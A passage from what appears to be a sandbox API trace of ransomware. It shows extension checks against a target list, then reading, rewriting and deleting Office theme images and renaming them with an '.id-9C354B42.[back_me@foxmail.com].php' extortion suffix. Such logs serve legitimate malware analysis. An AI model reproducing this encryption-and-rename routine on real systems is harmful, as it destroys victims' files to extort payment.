returned 4 [0046.367] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.367] lstrlenW (lpString=".xls") returned 4 [0046.367] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.367] lstrlenW (lpString=".xlsx") returned 5 [0046.367] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.367] lstrlenW (lpString=".ppt") returned 4 [0046.367] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.367] lstrlenW (lpString=".zip") returned 4 [0046.367] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.367] lstrlenW (lpString=".rar") returned 4 [0046.367] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.367] lstrlenW (lpString=".bz2") returned 4 [0046.368] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString=".7z") returned 3 [0046.368] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString=".dbf") returned 4 [0046.368] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString=".1cd") returned 4 [0046.368] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString=".jpg") returned 4 [0046.368] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString=".doc") returned 4 [0046.368] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString=".docx") returned 5 [0046.368] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.368] lstrlenW (lpString=".pdf") returned 4 [0046.368] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString=".xls") returned 4 [0046.368] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.368] lstrlenW (lpString=".xlsx") returned 5 [0046.368] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.368] lstrlenW (lpString=".ppt") returned 4 [0046.368] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.368] lstrlenW (lpString=".zip") returned 4 [0046.368] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.368] lstrlenW (lpString=".rar") returned 4 [0046.368] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.368] lstrlenW (lpString=".bz2") returned 4 [0046.368] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.368] lstrlenW (lpString=".7z") returned 3 [0046.369] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.369] lstrlenW (lpString=".dbf") returned 4 [0046.369] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.369] lstrlenW (lpString=".1cd") returned 4 [0046.369] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.369] lstrlenW (lpString=".jpg") returned 4 [0046.369] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.369] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.369] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.369] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1925) returned 1 [0046.369] CloseHandle (hObject=0x1b0) returned 1 [0046.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20 [0046.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.370] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.370] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.371] GetLastError () returned 0x0 [0046.371] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x785, lpOverlapped=0x0) returned 1 [0046.373] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x790, lpOverlapped=0x0) returned 1 [0046.374] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.374] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.374] SetEndOfFile (hFile=0x194) returned 1 [0046.374] CloseHandle (hObject=0x194) returned 1 [0046.374] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.374] SetEndOfFile (hFile=0x1b0) returned 1 [0046.375] CloseHandle (hObject=0x1b0) returned 1 [0046.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.375] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1 [0046.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.375] lstrlenW (lpString=".doc") returned 4 [0046.375] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.375] lstrlenW (lpString=".docx") returned 5 [0046.375] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.375] lstrlenW (lpString=".pdf") returned 4 [0046.375] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.375] lstrlenW (lpString=".xls") returned 4 [0046.375] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.375] lstrlenW (lpString=".xlsx") returned 5 [0046.376] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.376] lstrlenW (lpString=".ppt") returned 4 [0046.376] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString=".zip") returned 4 [0046.376] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString=".rar") returned 4 [0046.376] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString=".bz2") returned 4 [0046.376] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.376] lstrlenW (lpString=".7z") returned 3 [0046.376] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString=".dbf") returned 4 [0046.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString=".1cd") returned 4 [0046.376] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString=".jpg") returned 4 [0046.376] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.376] lstrlenW (lpString=".doc") returned 4 [0046.376] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.376] lstrlenW (lpString=".docx") returned 5 [0046.376] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.376] lstrlenW (lpString=".pdf") returned 4 [0046.376] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString=".xls") returned 4 [0046.376] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.376] lstrlenW (lpString=".xlsx") returned 5 [0046.376] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.377] lstrlenW (lpString=".ppt") returned 4 [0046.377] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.377] lstrlenW (lpString=".zip") returned 4 [0046.377] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.377] lstrlenW (lpString=".rar") returned 4 [0046.377] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.377] lstrlenW (lpString=".bz2") returned 4 [0046.377] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.377] lstrlenW (lpString=".7z") returned 3 [0046.377] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.377] lstrlenW (lpString=".dbf") returned 4 [0046.377] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.377] lstrlenW (lpString=".1cd") returned 4 [0046.377] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0046.377] lstrlenW (lpString=".jpg") returned 4 [0046.377] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.377] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.377] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.378] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=27407) returned 1 [0046.378] CloseHandle (hObject=0x1b0) returned 1 [0046.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20 [0046.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.378] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.378] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.379] GetLastError () returned 0x0 [0046.379] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x6b0f, lpOverlapped=0x0) returned 1 [0046.572] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6b10, lpOverlapped=0x0) returned 1 [0046.574] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.574] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.574] SetEndOfFile (hFile=0x194) returned 1 [0046.574] CloseHandle (hObject=0x194) returned 1 [0046.574] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.574] SetEndOfFile (hFile=0x1b0) returned 1 [0046.575] CloseHandle (hObject=0x1b0) returned 1 [0046.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.575] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString=".doc") returned 4 [0046.576] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.576] lstrlenW (lpString=".docx") returned 5 [0046.576] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.576] lstrlenW (lpString=".pdf") returned 4 [0046.576] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.576] lstrlenW (lpString=".xls") returned 4 [0046.576] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.576] lstrlenW (lpString=".xlsx") returned 5 [0046.576] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.576] lstrlenW (lpString=".ppt") returned 4 [0046.576] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString=".zip") returned 4 [0046.576] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.576] lstrlenW (lpString=".rar") returned 4 [0046.576] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.576] lstrlenW (lpString=".bz2") returned 4 [0046.576] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.576] lstrlenW (lpString=".7z") returned 3 [0046.576] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString=".dbf") returned 4 [0046.576] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString=".1cd") returned 4 [0046.576] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.576] lstrlenW (lpString=".jpg") returned 4 [0046.576] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString=".doc") returned 4 [0046.577] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString=".docx") returned 5 [0046.577] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.577] lstrlenW (lpString=".pdf") returned 4 [0046.577] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString=".xls") returned 4 [0046.577] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.577] lstrlenW (lpString=".xlsx") returned 5 [0046.577] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.577] lstrlenW (lpString=".ppt") returned 4 [0046.577] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString=".zip") returned 4 [0046.577] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.577] lstrlenW (lpString=".rar") returned 4 [0046.577] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.577] lstrlenW (lpString=".bz2") returned 4 [0046.577] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString=".7z") returned 3 [0046.577] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString=".dbf") returned 4 [0046.577] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString=".1cd") returned 4 [0046.577] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0046.577] lstrlenW (lpString=".jpg") returned 4 [0046.577] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.578] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.578] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.618] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=43276) returned 1 [0046.618] CloseHandle (hObject=0x184) returned 1 [0046.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20 [0046.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.618] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.619] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.619] GetLastError () returned 0x0 [0046.619] ReadFile (in: hFile=0x184, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xa90c, lpOverlapped=0x0) returned 1 [0046.695] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xa910, lpOverlapped=0x0) returned 1 [0046.697] ReadFile (in: hFile=0x184, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.697] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.697] SetEndOfFile (hFile=0x1b0) returned 1 [0046.697] CloseHandle (hObject=0x1b0) returned 1 [0046.697] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.697] SetEndOfFile (hFile=0x184) returned 1 [0046.698] CloseHandle (hObject=0x184) returned 1 [0046.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.699] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0046.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.699] lstrlenW (lpString=".doc") returned 4 [0046.699] lstrcmpiW 